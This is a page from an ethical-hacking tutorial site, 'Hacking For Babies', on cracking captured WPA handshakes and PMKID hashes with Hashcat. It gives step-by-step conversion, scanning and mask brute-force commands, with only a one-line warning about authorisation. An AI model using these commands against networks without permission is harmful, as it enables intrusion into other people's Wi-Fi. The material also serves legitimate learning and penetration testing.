Hacking For Babies
  • Introduction
  • Ethical Hacking
  • Kali Linux
    • Why Kali ?
    • Virtual Machine
    • kali on Cloud
    • Bootable USB
    • Dual Boot Kali
    • Kali Nethunter
    • Most Used Linux Commands
    • Additional Information
  • Network Basics
    • What is the internet ?
    • Key Words
    • Network devices
    • LAN / WAN
    • VPN (Virtual Private Network)
    • Deep and Dark Web
    • Networking Commands
    • Additional Information
  • OSINT
    • Maltego
    • Google Advanced Search Operators
    • OSINT Username Finder
    • Social Media OSINT
    • Reverse Image Search
    • Protect yourself from OSINT
    • Additional Information
  • Digital Forensics
  • Phishing Attacks
    • Temporary Numbers
    • GitHub Projects/Tools
    • Kali Pre-Installed Tools
    • Emails Tricks
    • How to secure yourself from phishing attacks
    • Additional Information
  • Hardware Attacks
    • Marketplaces and Websites
    • Keylogger
    • USB Killer
    • Ethernet Hacking Tools
    • Flipper Zero
    • Bad USB
  • HID Attacks
    • Classic Bad USB
    • Wireless Bad USB
    • Keystroke Injection Cable
    • Other Tools Using the Some Concept
    • Simple Ducky Script
    • Reverse Shell Ducky Script
    • Solution for Bad USB
  • Cryptography
    • What is Cryptography ?
    • Simple Cryptography Algorithms
    • Hash Algorithms
    • Symmetric / Asymmetric cryptography
    • RSA Cryptosystem
    • Quantum Computers VS Cryptography
    • Steganography: Hiding Data in music and photos
    • Additional Information
  • Password Attacks
    • Dictionary Attacks
    • Brute Force Attacks
    • Hashcat
    • Hydra
    • Other Password Attacks Tools
    • Protect your Self against Password Attacks
  • Wireless Attacks
    • RFID / NFC Attacks
    • Bluetooth Attacks
    • MouseJack Attacks
    • IR Replay Attacks
    • RF Attacks
    • Wifi Attacks
  • WIFI Attacks
    • Wireless Adapters
    • Basic WIFI Manipulation
    • Deauthentication Attack
    • WIFI Cracking
    • MITM Attacks
    • Prebuild WIFI Pentesting Tools
    • WIFI Attack Solution
    • Additional Information
  • WIFI Cracking
    • WEP Cracking
    • WPS Attack
    • WPA Handshake Capture
    • PMKID Hash Capture
    • Hashcat Cracking
    • Wifite
    • Airgeddon
    • Fern WIFI Cracker
    • Protecting your Wi-Fi network from cracking
  • Coming Soon
Powered by GitBook
On this page
  • Overview
  • Cracking WPA WIFI Handshake
  • Cracking PMKID
  • Using GPU Cloud
  • Other YouTube Tutorials
  1. WIFI Cracking

Hashcat Cracking

PreviousPMKID Hash CaptureNextWifite

Last updated 1 year ago

Overview

Cracking Wi-Fi passwords using Hashcat is a technique employed to recover the original password from a captured Wi-Fi handshake or PMKID hash. Hashcat is a powerful password recovery tool that utilizes the computational power of GPUs or CPUs to perform brute-force, dictionary, or mask-based attacks. By leveraging various attack modes and wordlists, Hashcat attempts to find the correct password by hashing and comparing it to the captured hash. This process can be time-consuming and resource-intensive, depending on the complexity of the password and the available computing power. It is important to note that cracking Wi-Fi passwords without proper authorization is illegal and unethical.

you can find here the official documentation of Hashcat (and how to use it):

Cracking WPA WIFI Handshake

  1. converting the cap file

  • converting the cap captured file into a hccapx file

sudo /usr/share/hashcat-utils/cap2hccapx.bin captured_file.cap wpa2.hccapx
  • converting the cap captured file into a hc22000 file

hcxpcapngtool -o wpa2.hc22000 captured_file.cap
  1. Cracking the hc22000 file using Hascat

  • Check GPU :

hashcat -I
  • Cracking 8 digits WPA WIFI Password

hashcat -m 2500 -a 3 wpa2.hccapx ?d?d?d?d?d?d?d?d

You can press "s" to see the status of the hashing

to show the cracked password type:

[the previouse command] --show

  • Increment from 8 to 20 digits WPA2 WIFI Password

hashcat -m 2500 -a 3 wpa2.hccapx --increment --increment-min 8 --increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
  • Cracking 8 digits WPA WIFI Password (hc22000 method)

hashcat -m 22000 wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d
  • Cracking 10 digits WPA WIFI Password (hc22000 method)

hashcat -m 22000 wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
  • Cracking 10 digits and alphabetic (Lowercase and uppercase) WPA WIFI Password (hc22000 method)

hashcat -m 22000 wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1
  • Increment from 8 to 18 digits WPA2 WIFI Password (hc22000 method)

hashcat -m 22000 wpa2.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
  • Increment from 8 to 12 digits and alphabetic (Lowercase and uppercase) WPA2 WIFI Password (hc22000 method)

hashcat -m 22000 wpa2.hc22000 -1 ?d?l?u -a 3 --increment --increment-min 8 --increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1

Cracking PMKID

  1. converting the pcapng captured file into a hc22000 file

hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng

essidlist: list containing all SSIDs captured previously

hash.hc22000: the new format of the capured file

  1. finding the mac address of the target WIFI

first, Stop all services accessing the WIFI Network

sudo systemctl stop NetworkManager.service 
sudo systemctl stop wpa_supplicant.service

second, scaning

sudo hcxdumptool --do_rcascan -i [interface]

finally, you can copy the mac address in any file and complete the steps

you can restart the Network services.

if you don't restart it is not a problem but in upcoming work with kali you can face some problem while connecting to the internet.

  1. Cracking the hc22000 file using Hascat

  • cracking the WIFI using a wordlist

hashcat -m 22000 hash.hc22000 wordlist.txt

you can edit the hash.hc22000 file by deleting the unneeded data of other WIFI Network

you can use any wordlist you want in this command (exemple: rockyou.txt)

  • brute forcing an 8 digit password WIFI Password

hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
  • brute forcing an 8 to 18 digit password WIFI Password

hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

Using GPU Cloud

Other YouTube Tutorials

You can check those YouTube Videos/Tutorials about Hashcat Cracking

For more details about Password Attacking and Hashcat , Check this Chapter:

You can watch created by to learn more about Cracking WIFI using GPU Cloud : how to setup an cloud and how to run the attack

(PMKID Cracking) created by

(Brute Force WPA2) created by

(Brute forcing using powerful GPU) created by

(Cracking using GPU Cloud) created by

This YouTube Video
David Bombal
This YouTube Video
David Bombal
This YouTube Video
David Bombal
This YouTube Video
David Bombal
This YouTube Video
David Bombal
Password Attacks
Hashcat
Logomask_attack [hashcat wiki]